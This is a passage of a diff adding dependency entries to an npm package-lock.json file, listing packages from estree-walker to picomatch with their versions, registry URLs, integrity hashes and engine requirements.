"sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estree-walker": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-2.0.2.tgz", + "integrity": "sha512-Rfkk/Mp/DL7JVje3u18FxFujQlTNR2q6QfMSMB7AvCBx91NGj/ba3kCfza0f6dVDbw7YlRf/nDrn7pQrCCyQ/w==" + }, + "node_modules/esutils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", + "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/fast-deep-equal": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", + "dev": true + }, + "node_modules/fast-glob": { + "version": "3.2.12", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.2.12.tgz", + "integrity": "sha512-DVj4CQIYYow0BlaelwK1pHl5n5cRSJfM60UA0zK891sVInoPri2Ekj7+e1CT3/3qxXenpI+nBBmQAcJPJgaj4w==", + "dev": true, + "dependencies": { + "@nodelib/fs.stat": "^2.0.2", + "@nodelib/fs.walk": "^1.2.3", + "glob-parent": "^5.1.2", + "merge2": "^1.3.0", + "micromatch": "^4.0.4" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/fast-glob/node_modules/glob-parent": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/fast-json-stable-stringify": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", + "dev": true + }, + "node_modules/fast-levenshtein": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", + "integrity": "sha512-DCXu6Ifhqcks7TZKY3Hxp3y6qphY5SJZmrWMDrKcERSOXWQdMhU9Ig/PYrzyw/ul9jOIyh0N4M0tbC5hodg8dw==", + "dev": true + }, + "node_modules/fastq": { + "version": "1.15.0", + "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz", + "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==", + "dev": true, + "dependencies": { + "reusify": "^1.0.4" + } + }, + "node_modules/file-entry-cache": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", + "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", + "dev": true, + "dependencies": { + "flat-cache": "^3.0.4" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "node_modules/fill-range": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", + "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", + "dev": true, + "dependencies": { + "to-regex-range": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/find-up": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", + "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", + "dev": true, + "dependencies": { + "locate-path": "^6.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/flat-cache": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", + "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", + "dev": true, + "dependencies": { + "flatted": "^3.1.0", + "rimraf": "^3.0.2" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "node_modules/flatted": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.7.tgz", + "integrity": "sha512-5nqDSxl8nn5BSNxyR3n4I6eDmbolI6WT+QqR547RwxQapgjQBmtktdP+HTBb/a/zLsbzERTONyUB5pefh5TtjQ==", + "dev": true + }, + "node_modules/fraction.js": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-4.2.0.tgz", + "integrity": "sha512-MhLuK+2gUcnZe8ZHlaaINnQLl0xRIGRfcGk2yl8xoQAfHrSsL3rYu6FCmBdkdbhc9EPlwyGHewaRsvwRMJtAlA==", + "dev": true, + "engines": { + "node": "*" + }, + "funding": { + "type": "patreon", + "url": "https://www.patreon.com/infusion" + } + }, + "node_modules/fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "dev": true + }, + "node_modules/fsevents": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", + "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "dev": true, + "hasInstallScript": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, + "node_modules/function-bind": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", + "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", + "dev": true + }, + "node_modules/glob": { + "version": "7.2.3", + "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", + "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "dev": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^3.1.1", + "once": "^1.3.0", + "path-is-absolute": "^1.0.0" + }, + "engines": { + "node": "*" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/globals": { + "version": "13.19.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.19.0.tgz", + "integrity": "sha512-dkQ957uSRWHw7CFXLUtUHQI3g3aWApYhfNR2O6jn/907riyTYKVBmxYVROkBcY614FSSeSJh7Xm7SrUWCxvJMQ==", + "dev": true, + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/grapheme-splitter": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/grapheme-splitter/-/grapheme-splitter-1.0.4.tgz", + "integrity": "sha512-bzh50DW9kTPM00T8y4o8vQg89Di9oLJVLW/KaOGIXJWP/iqCN6WKYkbNOF04vFLJhwcpYUh9ydh/+5vpOqV4YQ==", + "dev": true + }, + "node_modules/has": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", + "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", + "dev": true, + "dependencies": { + "function-bind": "^1.1.1" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/ignore": { + "version": "5.2.4", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", + "integrity": "sha512-MAb38BcSbH0eHNBxn7ql2NH/kX33OkB3lZ1BNdh7ENeRChHTYsTvWrMubiIAMNS2llXEEgZ1MUOBtXChP3kaFQ==", + "dev": true, + "engines": { + "node": ">= 4" + } + }, + "node_modules/import-fresh": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", + "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", + "dev": true, + "dependencies": { + "parent-module": "^1.0.0", + "resolve-from": "^4.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/imurmurhash": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "dev": true, + "engines": { + "node": ">=0.8.19" + } + }, + "node_modules/inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "dev": true, + "dependencies": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", + "dev": true + }, + "node_modules/is-binary-path": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", + "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==", + "dev": true, + "dependencies": { + "binary-extensions": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-core-module": { + "version": "2.11.0", + "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.11.0.tgz", + "integrity": "sha512-RRjxlvLDkD1YJwDbroBHMb+cukurkDWNyHx7D3oNB5x9rb5ogcksMC5wHCadcXoo67gVr/+3GFySh3134zi6rw==", + "dev": true, + "dependencies": { + "has": "^1.0.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-extglob": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", + "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-glob": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", + "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", + "dev": true, + "dependencies": { + "is-extglob": "^2.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "dev": true, + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/is-path-inside": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", + "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "dev": true + }, + "node_modules/js-sdsl": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/js-sdsl/-/js-sdsl-4.3.0.tgz", + "integrity": "sha512-mifzlm2+5nZ+lEcLJMoBK0/IH/bDg8XnJfd/Wq6IP+xoCjLZsTOnV2QpxlVbX9bMnkl5PdEjNtBJ9Cj1NjifhQ==", + "dev": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/js-sdsl" + } + }, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "dev": true, + "dependencies": { + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==", + "dev": true + }, + "node_modules/json-stable-stringify-without-jsonify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", + "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", + "dev": true + }, + "node_modules/levn": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", + "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", + "dev": true, + "dependencies": { + "prelude-ls": "^1.2.1", + "type-check": "~0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/lilconfig": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-2.0.6.tgz", + "integrity": "sha512-9JROoBW7pobfsx+Sq2JsASvCo6Pfo6WWoUW79HuB1BCoBXD4PLWJPqDF6fNj67pqBYTbAHkE57M1kS/+L1neOg==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/locate-path": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", + "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", + "dev": true, + "dependencies": { + "p-locate": "^5.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/lodash": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", + "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==", + "dev": true + }, + "node_modules/lodash.merge": { + "version": "4.6.2", + "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", + "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", + "dev": true + }, + "node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/magic-string": { + "version": "0.25.9", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.25.9.tgz", + "integrity": "sha512-RmF0AsMzgt25qzqqLc1+MbHmhdx0ojF2Fvs4XnOqz2ZOBXzzkEwc/dJQZCYHAn7v1jbVOjAZfK8msRn4BxO4VQ==", + "dependencies": { + "sourcemap-codec": "^1.4.8" + } + }, + "node_modules/merge2": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", + "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/micromatch": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", + "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", + "dev": true, + "dependencies": { + "braces": "^3.0.2", + "picomatch": "^2.3.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/minimatch": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", + "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "dev": true, + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.7.tgz", + "integrity": "sha512-bzfL1YUZsP41gmu/qjrEk0Q6i2ix/cVeAhbCbqH9u3zYutS1cLg00qhrD0M2MVdCcx4Sc0UpP2eBWo9rotpq6g==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/nanoid": { + "version": "3.3.7", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.7.tgz", + "integrity": "sha512-eSRppjcPIatRIMC1U6UngP8XFcz8MQWGQdt1MTBQ7NaAmvXDfvNxbvWV3x2y6CdEUciCSsDHDQZbhYaB8QEo2g==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", + "dev": true + }, + "node_modules/natural-compare-lite": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare-lite/-/natural-compare-lite-1.4.0.tgz", + "integrity": "sha512-Tj+HTDSJJKaZnfiuw+iaF9skdPpTo2GtEly5JHnWV/hfv2Qj/9RKsGISQtLh2ox3l5EAGw487hnBee0sIJ6v2g==", + "dev": true + }, + "node_modules/node-releases": { + "version": "2.0.8", + "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.8.tgz", + "integrity": "sha512-dFSmB8fFHEH/s81Xi+Y/15DQY6VHW81nXRj86EMSL3lmuTmK1e+aT4wrFCkTbm+gSwkw4KpX+rT/pMM2c1mF+A==", + "dev": true + }, + "node_modules/normalize-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", + "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/normalize-range": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/normalize-range/-/normalize-range-0.1.2.tgz", + "integrity": "sha512-bdok/XvKII3nUpklnV6P2hxtMNrCboOjAcyBuQnWEhO665FwrSNRxU+AqpsyvO6LgGYPspN+lu5CLtw4jPRKNA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/nth-check": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/nth-check/-/nth-check-2.1.1.tgz", + "integrity": "sha512-lqjrjmaOoAnWfMmBPL+XNnynZh2+swxiX3WUE0s4yEHI6m+AwrK2UZOimIRl3X/4QctVqS8AiZjFqyOGrMXb/w==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0" + }, + "funding": { + "url": "https://github.com/fb55/nth-check?sponsor=1" + } + }, + "node_modules/object-hash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-3.0.0.tgz", + "integrity": "sha512-RSn9F68PjH9HqtltsSnqYC1XXoWe9Bju5+213R98cNGttag9q9yAOTzdbsqvIa7aNm5WffBZFpWYr2aWrklWAw==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dev": true, + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/optionator": { + "version": "0.9.1", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.1.tgz", + "integrity": "sha512-74RlY5FCnhq4jRxVUPKDaRwrVNXMqsGsiW6AJw4XK8hmtm10wC0ypZBLw5IIp85NZMr91+qd1RvvENwg7jjRFw==", + "dev": true, + "dependencies": { + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0", + "word-wrap": "^1.2.3" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/p-limit": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", + "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, + "dependencies": { + "yocto-queue": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-locate": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", + "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", + "dev": true, + "dependencies": { + "p-limit": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/parent-module": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", + "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", + "dev": true, + "dependencies": { + "callsites": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/path-parse": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", + "dev": true + }, + "node_modules/path-type": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", + "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/picocolors": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", + "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==" + }, + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": 